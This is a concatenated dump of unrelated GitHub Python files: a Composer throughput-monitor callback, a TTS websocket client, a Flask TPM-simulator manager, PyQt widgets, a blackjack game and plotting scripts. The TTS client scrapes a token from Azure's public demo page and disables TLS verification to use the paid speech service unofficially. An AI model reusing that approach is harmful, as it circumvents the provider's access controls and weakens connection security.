callbacks=[SpeedMonitor(window_size=100)],\n ... )\n\n .. testcleanup::\n\n trainer.engine.close()\n\n The training throughput is logged by the :class:`~composer.loggers.logger.Logger` to the following keys as\n described below.\n\n +-----------------------+-------------------------------------------------------------+\n | Key | Logged data |\n +=======================+=============================================================+\n | | Rolling average (over ``window_size`` most recent |\n | ``throughput/step`` | batches) of the number of samples processed per second |\n | | |\n +-----------------------+-------------------------------------------------------------+\n | | Number of samples processed per second (averaged over |\n | ``throughput/epoch`` | an entire epoch) |\n +-----------------------+-------------------------------------------------------------+\n |``wall_clock/train`` | Total elapsed training time |\n +-----------------------+-------------------------------------------------------------+\n |``wall_clock/val`` | Total elapsed validation time |\n +-----------------------+-------------------------------------------------------------+\n |``wall_clock/total`` | Total elapsed time (wall_clock/train + wall_clock/val) |\n +-----------------------+-------------------------------------------------------------+\n\n Args:\n window_size (int, optional):\n Number of batches to use for a rolling average of throughput. Default to 100.\n \"\"\"\n\n def __init__(self, window_size: int = 100):\n super().__init__()\n self.train_examples_per_epoch = 0\n\n # log the total wall clock time that this program has been running for\n self.wall_clock_total = 0.0\n\n # log the total wall clock_time that has been spent in training\n self.wall_clock_train = 0.0\n\n # log the total wall clock_time that has been spent in validation\n self.wall_clock_val = 0.0\n\n self.epoch_start_time = 0.0\n self.validation_start_time = 0.0\n self.epoch_time_in_validation = 0.0\n self.batch_start_num_samples = None\n self.batch_end_times: Deque[float] = deque(maxlen=window_size + 1) # rolling list of batch end times\n self.batch_num_samples: Deque[int] = deque(maxlen=window_size) # rolling list of num samples in batch.\n self.window_size = window_size\n self.loaded_state: Optional[Dict[str, Any]] = None\n\n def state_dict(self) -> Dict[str, Any]:\n \"\"\"Returns a dictionary representing the internal state of the SpeedMonitor object.\n\n The returned dictionary is pickle-able via :func:`torch.save`.\n\n Returns:\n Dict[str, Any]: The state of the SpeedMonitor object\n \"\"\"\n current_time = time.time()\n return {\n \"train_examples_per_epoch\": self.train_examples_per_epoch,\n \"wall_clock/train\": self.wall_clock_train,\n \"wall_clock/val\": self.wall_clock_val,\n \"wall_clock/total\": self.wall_clock_total,\n \"epoch_duration\": current_time - self.epoch_start_time,\n \"batch_durations\": [current_time - x for x in self.batch_end_times],\n \"batch_num_samples\": self.batch_num_samples,\n }\n\n def load_state_dict(self, state: Dict[str, Any]) -> None:\n \"\"\"Restores the state of SpeedMonitor object.\n\n Args:\n state (Dict[str, Any]): The state of the object,\n as previously returned by :meth:`.state_dict`\n \"\"\"\n self.loaded_state = state\n\n def _load_state(self) -> None:\n current_time = time.time()\n if self.loaded_state is not None:\n self.train_examples_per_epoch = self.loaded_state[\"train_examples_per_epoch\"]\n self.wall_clock_train = self.loaded_state[\"wall_clock/train\"]\n self.wall_clock_val = self.loaded_state[\"wall_clock/val\"]\n self.wall_clock_total = self.loaded_state[\"wall_clock/total\"]\n self.epoch_start_time = current_time - self.loaded_state[\"epoch_duration\"]\n self.batch_end_times = deque([current_time - x for x in self.loaded_state[\"batch_durations\"]],\n maxlen=self.window_size + 1)\n self.batch_num_samples = self.loaded_state[\"batch_num_samples\"]\n self.loaded_state = None\n\n def batch_start(self, state: State, logger: Logger) -> None:\n del logger # unused\n self._load_state()\n self.batch_start_num_samples = state.timestamp.sample\n\n def epoch_start(self, state: State, logger: Logger):\n del state, logger # unused\n self._load_state()\n self.epoch_start_time = time.time()\n self.batch_end_times.clear()\n self.batch_num_samples.clear()\n self.train_examples_per_epoch = 0\n\n def batch_end(self, state: State, logger: Logger):\n self.batch_end_times.append(time.time())\n new_num_samples = state.timestamp.sample\n assert self.batch_start_num_samples is not None, \"self.batch_start_num_samples should have been set on Event.BATCH_START\"\n batch_num_samples = int(new_num_samples - self.batch_start_num_samples)\n self.batch_num_samples.append(batch_num_samples)\n self.train_examples_per_epoch += batch_num_samples\n if len(self.batch_end_times) == self.window_size + 1:\n throughput = sum(self.batch_num_samples) / (self.batch_end_times[-1] - self.batch_end_times[0])\n logger.data_batch({'samples/step': throughput})\n\n def eval_start(self, state: State, logger: Logger):\n del state, logger # unused\n self.validation_start_time = time.time()\n\n def eval_end(self, state: State, logger: Logger):\n del state, logger # unused\n self.epoch_time_in_validation += time.time() - self.validation_start_time\n\n def epoch_end(self, state: State, logger: Logger):\n del state # unused\n\n epoch_time_in_train = time.time() - self.epoch_start_time - self.epoch_time_in_validation\n self.wall_clock_train += epoch_time_in_train\n self.wall_clock_val += self.epoch_time_in_validation\n self.wall_clock_total += epoch_time_in_train + self.epoch_time_in_validation\n assert (self.wall_clock_train + self.wall_clock_val) == self.wall_clock_total\n\n logger.data_epoch({\n \"wall_clock/train\": self.wall_clock_train,\n })\n logger.data_epoch({\n \"wall_clock/val\": self.wall_clock_val,\n })\n logger.data_epoch({\n \"wall_clock/total\": self.wall_clock_total,\n })\n logger.data_epoch({\n \"samples/epoch\": self.train_examples_per_epoch / epoch_time_in_train,\n })\n self.epoch_time_in_validation = 0.0\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/callbacks/speed_monitor.py","file_name":"speed_monitor.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22095233570","text":"from asyncio import tasks\r\nimport asyncio\r\nimport websockets\r\nimport re\r\nimport shortuuid\r\nimport asyncio\r\nfrom websockets import connection, client\r\nimport websockets\r\nfrom datetime import datetime\r\nimport logging\r\nimport json\r\nfrom websockets.extensions.permessage_deflate import (\r\n ServerPerMessageDeflateFactory,\r\n ClientPerMessageDeflateFactory,\r\n)\r\nfrom websocket import create_connection\r\nfrom uuid import uuid1, uuid4\r\nfrom requests import Session\r\nimport simpleaudio as sa\r\nimport sounddevice as sd\r\nimport soundfile as sf\r\nfrom playsound import playsound\r\n\r\n# TTS文字转语音\r\nclass TTS:\r\n def __init__(self):\r\n self.request = Session()\r\n self.headers = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n \"referer\": \"https://azure.microsoft.com\",\r\n \"origin\": \"https://azure.microsoft.com/\",\r\n \"authorization\": \"\",\r\n }\r\n self.wss_url = (\r\n \"wss://eastus.tts.speech.microsoft.com/cognitiveservices/websocket/v1\"\r\n )\r\n\r\n self.auth = \"Authorization\"\r\n self.token = \"\"\r\n # 参数列表\r\n self.params_list = []\r\n self.ws = None\r\n # 音频数据列表\r\n self.audio_map = {}\r\n # 当前请求id\r\n self.now_request = \"\"\r\n\r\n self.get_token()\r\n\r\n # websocket日志\r\n logger = logging.getLogger(\"websockets\")\r\n # logger = logging.getLogger(\"websockets.client\")\r\n logger.setLevel(logging.DEBUG)\r\n logger.addHandler(logging.StreamHandler())\r\n\r\n # 平台信息\r\n self.platform = {\r\n \"context\": {\r\n \"system\": {\r\n \"name\": \"SpeechSDK\",\r\n \"version\": \"1.19.0\",\r\n \"build\": \"JavaScript\",\r\n \"lang\": \"JavaScript\",\r\n },\r\n \"os\": {\r\n \"platform\": \"Browser/Win32\",\r\n \"name\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n \"version\": \"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n },\r\n }\r\n }\r\n # 语音信息\r\n self.voice = {\r\n \"synthesis\": {\r\n \"audio\": {\r\n \"metadataOptions\": {\r\n \"bookmarkEnabled\": False,\r\n \"sentenceBoundaryEnabled\": False,\r\n \"visemeEnabled\": False,\r\n \"wordBoundaryEnabled\": False,\r\n },\r\n \"outputFormat\": \"audio-24khz-160kbitrate-mono-mp3\",\r\n },\r\n \"language\": {\"autoDetection\": False},\r\n }\r\n }\r\n\r\n @property\r\n def authorization(self):\r\n return f\"Bearer {self.token}\"\r\n\r\n # 连接id\r\n @property\r\n def connection_id(self):\r\n return shortuuid.ShortUUID().random(32)\r\n\r\n # 请求id\r\n @property\r\n def requestId(self):\r\n # return shortuuid.ShortUUID().random(32).upper()\r\n return str(uuid1()).replace(\"-\", \"\").upper()\r\n # return \"EC7237308086480693BFEE6A20044BF3\"\r\n\r\n @property\r\n def ws_url(self):\r\n return f\"{self.wss_url}?Authorization=bearer%20{self.token}&X-ConnectionId={self.connection_id}\"\r\n\r\n # 当前时间字符串\r\n @property\r\n def now_time(self):\r\n now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")\r\n return now[:-3] + \"Z\"\r\n\r\n # 获取首页token\r\n def get_token(self):\r\n \"\"\"\r\n url:https://azure.microsoft.com/zh-cn/services/cognitive-services/text-to-speech/\r\n \"\"\"\r\n logging.debug(\"获取token\")\r\n result = self.request.get(\r\n \"https://azure.microsoft.com/zh-cn/services/cognitive-services/text-to-speech/\",\r\n headers={\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\"\r\n },\r\n proxies={\"http\": \"\", \"https\": \"\"},\r\n verify=False,\r\n )\r\n if result.status_code != 200:\r\n print(\"请求token失败\", result.status_code)\r\n return\r\n data = result.text\r\n reg = re.compile(r'token: \"(.*?)\"')\r\n token_list = reg.findall(data)\r\n if len(token_list) <= 0:\r\n print(\"未获取到token\")\r\n return\r\n self.token = token_list[0]\r\n self.headers[\"authorization\"] = self.authorization\r\n print(self.token)\r\n\r\n # 获取数据\r\n def get_data(\r\n self,\r\n ):\r\n \"\"\"\r\n 链接url:https://eastus.tts.speech.microsoft.com/cognitiveservices/voices/list\r\n \"\"\"\r\n logging.debug(\"获取数据\")\r\n result = self.request.get(\r\n \"https://eastus.tts.speech.microsoft.com/cognitiveservices/voices/list\",\r\n headers=self.headers,\r\n proxies={\"http\": \"\", \"https\": \"\"},\r\n verify=False,\r\n )\r\n\r\n if result.status_code != 200:\r\n print(\"请求失败\", result.status_code)\r\n return\r\n data = result.json()\r\n self.params_list = data\r\n\r\n # 连接WebSocket\r\n def connect_ws(self, sync=False):\r\n self.get_data()\r\n # ws = await websockets.connect(\r\n # self.ws_url,\r\n # origin=\"https://azure.microsoft.com\",\r\n # extra_headers={\r\n # \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n # \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n # },\r\n # extensions=[ClientPerMessageDeflateFactory(client_max_window_bits=True)],\r\n # )\r\n print(self.ws_url)\r\n ws = create_connection(self.ws_url)\r\n self.ws = ws\r\n return self.ws\r\n\r\n # 异步连接WS\r\n async def async_connect_ws(self):\r\n self.get_data()\r\n print(self.ws_url)\r\n cookie_dict = self.request.cookies.get_dict()\r\n cookie_list = []\r\n for key in cookie_dict:\r\n cookie_list.append(f\"{key}={cookie_dict[key]}\")\r\n ws = await websockets.connect(\r\n self.ws_url,\r\n # origin=\"https://azure.microsoft.com\",\r\n extra_headers={\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n # \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n # \"Cookie\": \";\".join(cookie_list),\r\n },\r\n extensions=[ClientPerMessageDeflateFactory(client_max_window_bits=True)],\r\n )\r\n self.ws = ws\r\n return self.ws\r\n\r\n # async with websockets.connect(\r\n # self.ws_url,\r\n # # 不需要额外的请求头\r\n # # extra_headers={\r\n # # \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n # # \"Origin\": \"https://azure.microsoft.com\",\r\n # # \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n # # \"Sec-WebSocket-Extensions\": \"permessage-deflate; client_max_window_bits\",\r\n # # \"Sec-WebSocket-Key\": \"7mupLdK2iBPG7DudstgUPA==\",\r\n # # \"Sec-WebSocket-Version\": \"13\",\r\n # # },\r\n # ) as ws:\r\n # self.ws = ws\r\n # while True:\r\n # data = await ws.recv()\r\n # print(data)\r\n\r\n # # 发送数据之前\r\n # def before_send(self):\r\n # if not self.flag:\r\n # # 第一步\r\n # self.ws.send(\r\n # \"\"\"Path: speech.config\r\n # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n # X-Timestamp: 2022-05-21T03:50:01.359Z\r\n # Content-Type: application/json\r\n\r\n # {\"context\":{\"system\":{\"name\":\"SpeechSDK\",\"version\":\"1.19.0\",\"build\":\"JavaScript\",\"lang\":\"JavaScript\"},\"os\":{\"platform\":\"Browser/Win32\",\"name\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\"version\":\"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\"}}}\"\"\"\r\n # )\r\n # # 第二步\r\n # self.ws.send(\r\n # \"\"\"Path: synthesis.context\r\n # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n # X-Timestamp: 2022-05-21T03:50:01.360Z\r\n # Content-Type: application/json\r\n\r\n # {\"synthesis\":{\"audio\":{\"metadataOptions\":{\"bookmarkEnabled\":false,\"sentenceBoundaryEnabled\":false,\"visemeEnabled\":false,\"wordBoundaryEnabled\":false},\"outputFormat\":\"audio-24khz-160kbitrate-mono-mp3\"},\"language\":{\"autoDetection\":false}}}\"\"\"\r\n # )\r\n # self.ws.send(\r\n # \"\"\"Path: ssml\r\n # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n # X-Timestamp: 2022-05-21T03:50:01.360Z\r\n # Content-Type: application/ssml+xml\r\n\r\n # 你可将此文本替换为所需的任何文本。你可在此文本框中编写或在此处粘贴你自己的文本。\r\n\r\n # 试用不同的语言和声音。改变语速和音调。你甚至可调整 SSML(语音合成标记语言),以控制文本不同部分的声音效果。单击上面的 SSML 试用一下!\r\n\r\n # 请尽情使用文本转语音功能!\"\"\"\r\n # )\r\n # self.flag = True\r\n\r\n # 文字转语音\r\n def text_to_speech(self, text: str):\r\n if not self.ws:\r\n self.connect_ws()\r\n\r\n requestId = self.requestId\r\n self.now_request = requestId\r\n now = self.now_time\r\n payload = f\"\"\"Path: speech.config\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/json\r\n\r\n{json.dumps(self.platform,separators=(',', ':'))}\"\"\"\r\n self.ws.send(payload)\r\n payload = f\"\"\"Path: synthesis.context\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/json\r\n\r\n{json.dumps(self.voice,separators=(',', ':'))}\"\"\"\r\n self.ws.send(payload)\r\n payload = f\"\"\"Path: ssml\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/ssml+xml\r\n\r\n{text}\"\"\"\r\n self.ws.send(payload)\r\n data = self.ws.recv()\r\n print(data)\r\n\r\n # 异步文字转语音\r\n async def text_to_speech_async(self, text: str):\r\n if not self.ws:\r\n await self.async_connect_ws()\r\n\r\n requestId = self.requestId\r\n self.now_request = requestId\r\n now = self.now_time\r\n payload = f\"\"\"Path: speech.config\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/json\\r\\n\\r\\n{json.dumps(self.platform,separators=(',', ':'))}\"\"\"\r\n await self.ws.send(payload)\r\n payload = f\"\"\"Path: synthesis.context\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/json\\r\\n\\r\\n{json.dumps(self.voice,separators=(',', ':'))}\"\"\"\r\n await self.ws.send(payload)\r\n payload = f\"\"\"Path: ssml\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/ssml+xml\\r\\n\\r\\n{text}\"\"\"\r\n await self.ws.send(payload)\r\n\r\n # 监听消息\r\n async def listen(self):\r\n while True:\r\n msg = await self.ws.recv()\r\n print(msg)\r\n self.parse_audio({\"data\": msg, \"requestId\": self.now_request})\r\n # try:\r\n # except websockets.exceptions.ConnectionClosed as e:\r\n # print(\"Connection closed\")\r\n # print(e)\r\n # break\r\n\r\n # 声音消息解析\r\n def parse_audio(self, params: dict):\r\n if not params:\r\n return\r\n\r\n data = params.get(\"data\", b\"\")\r\n requestId = params.get(\"requestId\")\r\n\r\n if isinstance(data, bytes):\r\n # 解析数��\r\n header_len = 130\r\n start_byte = b\"\\x00\\x80\"\r\n request_byte = data[\r\n len(start_byte) : len(f\"X-RequestId:{requestId}\") + len(start_byte)\r\n ]\r\n contentType_byte = data[48:71]\r\n streamId_byte = data[73:116]\r\n path_type = data[118:128]\r\n\r\n # 添加数据\r\n if not self.audio_map.get(requestId):\r\n self.audio_map.setdefault(requestId, [])\r\n\r\n body = data[header_len:]\r\n if body:\r\n self.audio_map[requestId].append(body)\r\n elif isinstance(data, str):\r\n if data.find(\"end\") != -1:\r\n self.play_audio(self.now_request)\r\n return\r\n\r\n # 播放声音\r\n def play_audio(self, requestId: str):\r\n audio_data = b\"\".join(self.audio_map.get(requestId, []))\r\n # winsound.PlaySound(audio_data, winsound.SND_MEMORY)\r\n # with open(r\"C:\\Users\\scp\\Desktop\\test.mp3\", \"wb\") as f:\r\n with open(\"./test.wav\", \"wb\") as f:\r\n f.write(audio_data)\r\n # audio = pyaudio.PyAudio()\r\n # stream = audio.open(format=pyaudio.paInt16, channels=1, rate=16000, output=True)\r\n # stream.write(audio_data)\r\n # dt = sa.play_buffer(audio_data, 2, 3, 44100)\r\n # sd.OutputStream(\r\n # samplerate=44100, blocksize=1024, device=0, fs=audio_data\r\n # ).start()\r\n # playsound(audio_data)\r\n # playsound(\"./test.wav\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n client = TTS()\r\n\r\n # client.connect_websocket()\r\n # client.text_to_speech(\"测试\")\r\n loop = asyncio.get_event_loop()\r\n conn = loop.run_until_complete(client.async_connect_ws())\r\n tasks = [\r\n asyncio.ensure_future(client.listen()),\r\n asyncio.ensure_future(client.text_to_speech_async(\"竟然没有一个能用的包\")),\r\n ]\r\n loop.run_until_complete(asyncio.wait(tasks))\r\n","repo_name":"xinlingqudongX/tts-voice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14874,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74265865446","text":"import subprocess\nimport shlex\nimport shutil\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route(\"/restart_tpm\", methods=[\"POST\"])\ndef restart_tpm():\n response = {}\n try:\n restart_tpm_cmd = shlex.split(\"/root/tpm2simulator/restart_tpm.sh\")\n read_key_output = subprocess.check_output(\n restart_tpm_cmd, stderr=subprocess.STDOUT)\n response = jsonify({'result': True})\n response.status_code = 200\n except Exception as e:\n response = jsonify({\"result\": False, \"error\": str(e)})\n response.status_code = 500\n return response\n\n\n@app.route(\"/reset_tpm\", methods=[\"POST\"])\ndef reset_tpm():\n response = {}\n try:\n reset_tpm_cmd = shlex.split(\"/root/tpm2simulator/reset_tpm.sh\")\n read_key_output = subprocess.check_output(\n reset_tpm_cmd, stderr=subprocess.STDOUT)\n response = jsonify({'result': True})\n response.status_code = 200\n except Exception as e:\n response = jsonify({\"result\": False, \"error\": str(e)})\n response.status_code = 500\n return response\n","repo_name":"nokia/tpm-study-environment","sub_path":"tpm-manager/tpm-manager.py","file_name":"tpm-manager.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22470141662","text":"from PyQt5.QtCore import QObject, QSize, Qt\nfrom PyQt5.QtGui import QPen, QColor\nfrom PyQt5.QtWidgets import QStyle, QComboBox, QAbstractItemDelegate, QStyledItemDelegate\n\n\nclass QPenStyleDelegate(QAbstractItemDelegate):\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def paint(self, painter, option, index):\n test = index.data(Qt.DisplayRole)\n penStyle = index.data(Qt.UserRole)\n r = option.rect\n\n if (option.state & QStyle.State_Selected):\n painter.save()\n painter.setBrush(option.palette.highlight())\n painter.setPen(Qt.NoPen)\n painter.drawRect(option.rect)\n painter.setPen(QPen(option.palette.highlightedText(), 2, penStyle))\n else:\n painter.setPen(penStyle)\n\n painter.drawLine(0, r.y() + r.height() / 2, r.right(), r.y() + r.height() / 2)\n\n if (option.state & QStyle.State_Selected):\n painter.restore()\n\n def sizeHint(self,option,index):\n return QSize(100, 30)\n\nclass QLineComboBox(QComboBox):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setItemDelegate(QPenStyleDelegate())\n\nclass QColorComboBox(QComboBox):\n def __init__(self, parent=None):\n super().__init__(parent)\n for i, clr in enumerate(QColor.colorNames()):\n self.addItem(clr, QColor(clr).name())\n self.model().item(i).setBackground(QColor(clr))\n\n# class MyQStyledItemDelegate(QStyledItemDelegate):\n# def __init__(self, height, parent=None):\n# super().__init__(height,parent)\n# self.m_Height=height\n#\n# def sizeHint(self, option, index):\n# size = QStyledItemDelegate.sizeHint(option, index)\n# size.setHeight(self.m_Height)\n# return size\n#\n# def paint(painter, option, index):\n# super().paint(painter, option, index)\n\nif __name__ == \"__main__\":\n from PyQt5.QtWidgets import *\n import sys\n app = QApplication(sys.argv)\n w = QLineComboBox()\n w.addItem(\"Solid\",Qt.SolidLine)\n w.addItem(\"Dot\",Qt.DotLine)\n w.currentIndexChanged.connect(lambda :print(w.currentData()))\n w.show()\n sys.exit(app.exec_())","repo_name":"hustlei/GraphDigitizer","sub_path":"src/core/widgets/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39922224030","text":"import utils\nimport pandas as pd\nimport pytorch_lightning as pl\nimport train\n\nCFG = {\n 'train_path': 'data/train.csv',\n 'test_path': 'data/test.csv',\n # 'model_name': 'microsoft/deberta-base',\n 'model_name': 'bert-base-uncased',\n 'max_len': 512,\n 'train_batch_size': 16,\n 'valid_batch_size': 16,\n 'dropout': 0.5,\n 'num_classes': 6,\n 'lr': 1e-5,\n 'epochs': 1\n\n}\nif __name__ == \"__main__\":\n utils.download_dataset(\"data\", \"kaggle competitions download -c feedback-prize-english-language-learning\", \"feedback-prize-english-language-learning.zip\")\n\n # train = pd.read_csv(\"data/train.csv\")\n # print(train.head())\n # test = pd.read_csv(\"data/test.csv\") \n\n train.train(CFG)\n\n","repo_name":"tbass134/Feedback-Prize---English-Language-Learning","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32456072580","text":"import random\r\nfrom art import logo\r\n\r\nprint(logo)\r\n\r\ncards_list = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\nboo_choice = [True, False]\r\n\r\n\r\ndef player(x1, x2, comp=False):\r\n if x1 == 11 and x1 + x2 > 21:\r\n x1 = 1\r\n elif x2 == 11 and x1 + x2 > 21:\r\n x2 = 1\r\n in_hands = [x1, x2]\r\n if comp:\r\n print(f\"Computer's cards are {x1} and X\")\r\n else:\r\n print(f\"Your cards are {x1} and {x2}\")\r\n\r\n sum_of_cards = sum(in_hands)\r\n return sum_of_cards\r\n\r\n\r\ndef game(player1, player2):\r\n question = input(\"Do you want to open (o) your cards or take another(t): \").lower()\r\n if question == \"o\":\r\n print(f\"Computer's cards sum was {player2}\")\r\n if player1 > 21:\r\n return False\r\n elif player1 > player2:\r\n comp_choose = random.choice(boo_choice)\r\n if comp_choose:\r\n new_card = random.choice(cards_list)\r\n player2 += new_card\r\n print(f\"New computer's cards sum wis {player2}\")\r\n if 22 > player2 > player1:\r\n return False\r\n elif 22 > player1 > player2:\r\n return True\r\n else:\r\n return True\r\n\r\n elif player1 < player2 < 22:\r\n return False\r\n else:\r\n return True\r\n elif question == \"t\":\r\n new_card = random.choice(cards_list)\r\n print(f\"The new card is {new_card}\")\r\n player1 += new_card\r\n if player1 > 21:\r\n return False\r\n print(f\"Computer's cards sum was {player2}\")\r\n comp_choose = random.choice(boo_choice)\r\n if comp_choose:\r\n new_card = random.choice(cards_list)\r\n player2 += new_card\r\n print(f\"New computer's cards sum wis {player2}\")\r\n if 22 > player2 > player1:\r\n return False\r\n elif 22 > player1 > player2:\r\n return True\r\n else:\r\n return True\r\n\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n print(\"\\n\")\r\n card1 = random.choice(cards_list)\r\n card2 = random.choice(cards_list)\r\n card3 = random.choice(cards_list)\r\n card4 = random.choice(cards_list)\r\n computer = True\r\n winning = game(player(card1, card2), player(card3, card4, comp=computer))\r\n if winning:\r\n print(\"You have won!\")\r\n else:\r\n print(\"You have lost.\")\r\n play_again = input(\"Do you want to continue? (y/n)\").lower()\r\n if play_again == \"y\":\r\n running = True\r\n else:\r\n running = False\r\n\r\n","repo_name":"Milan325/Blackjack-card-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38360837738","text":"import sys\r\n\r\n\r\ndef main(file_path):\r\n list_of_lines = []\r\n zana_cavas = ['Cavas, Forgotten Spirit:', 'Zana, Master Cartographer:']\r\n\r\n print('Creating lines.txt file.')\r\n with open(file_path, 'r', encoding='utf-8') as f:\r\n for line in f:\r\n if 'Cavas, Forgotten Spirit:' in line: # first encounter with cavas \r\n list_of_lines.append(line) \r\n for line in f: # look for zana or cavas memories\r\n if any(x in line for x in zana_cavas):\r\n list_of_lines.append(line)\r\n\r\n f = open('lines.txt', 'w', encoding='utf-8')\r\n for item in list_of_lines:\r\n f.write(item)\r\n input('Done! Press any key to continue...')\r\n\r\nif __name__ == \"__main__\":\r\n txt = input(r\"Copy path to your Client.txt file (e.g. C:\\Program Files (x86)\\Grinding Gear Games\\Path of Exile\\logs\\Client.txt): \")\r\n main(txt)\r\n","repo_name":"MarkoAdamko/poe_extractor","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21407354843","text":"\"\"\"\nPlotting csv files.\n\nAuthor: Nicoline Louise Thomsen\n\"\"\"\n\nimport csv as csv_libary\nimport matplotlib.pyplot as plt\n\n\nclass CSVprocessor:\n def __init__(self, filename, n_columns=2):\n self.filename = filename\n self.n_columns = n_columns\n\n self.data = self.get_data()\n\n def get_data(self):\n data = [[] for i in range(self.n_columns)]\n\n with open(self.filename, \"r\") as csvfileQuick:\n file = csv_libary.reader(csvfileQuick, delimiter=\",\")\n next(file) # Skip first line / header\n for row in file:\n for i in range(self.n_columns):\n data[i].append(row[i])\n\n return data\n\n def extract_float_columns(self, colum_ids):\n data = [[] for i in range(len(colum_ids))]\n\n for i, ID in enumerate(colum_ids):\n for j in range(len(self.data[ID])):\n data[i].append(float(self.data[ID][j]))\n\n return data\n\n def plot_float_data(\n self,\n specific_columns,\n title=None,\n xlabel=\"x\",\n ylabel=\"y\",\n ylim=None,\n column_name=\"none\",\n style=\"r\",\n ):\n # dataset = self.extract_float_columns(range(len(self.data)))\n dataset = self.extract_float_columns(specific_columns)\n t = dataset[0]\n data = dataset[1:]\n\n for i, column in enumerate(data):\n plt.plot(t, column, style, label=column_name + str(i), markersize=1)\n\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n if title != None:\n plt.title(title)\n\n if ylim != None:\n plt.ylim(ylim)\n\n if column_name != \"none\":\n plt.legend()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n CSV = CSVprocessor(\"logs/data_plot_3.csv\", 3)\n # CSV.plot_float_data(title='GA Algorithm', xlabel='generation', ylabel='fitness', ylim=[0,100], style='r')\n CSV.plot_float_data(\n [0, 1],\n title=\"GA Algorithm\",\n xlabel=\"generation\",\n ylabel=\"win-rate\",\n ylim=[0, 100],\n style=\"r\",\n )\n # CSV.plot_float_data([0, 2], title='GA Algorithm', xlabel='generation', ylabel='average fitness', style='r')\n","repo_name":"PositiveBeat/GA-AI_ludopy","sub_path":"src/CSVprocessor.py","file_name":"CSVprocessor.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71435357289","text":"\nclass Person:\n\n def __init__(self, last_Name, first_Name, date_of_Birth, type_of_Person):\n self.lastName = last_Name\n self.firstName = first_Name\n self.dateOfBirth = date_of_Birth\n self.typeOfPerson = type_of_Person\n\n\n","repo_name":"DylanNicoliniHub/SER330-SP2023-Final","sub_path":"person_def.py","file_name":"person_def.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28295678234","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(description='Visualise twist data')\n parser.add_argument('inputs', nargs='*', help='Input npy files')\n args = parser.parse_args()\n\n twist_grids = [np.load(filename) for filename in args.inputs]\n\n n_columns = 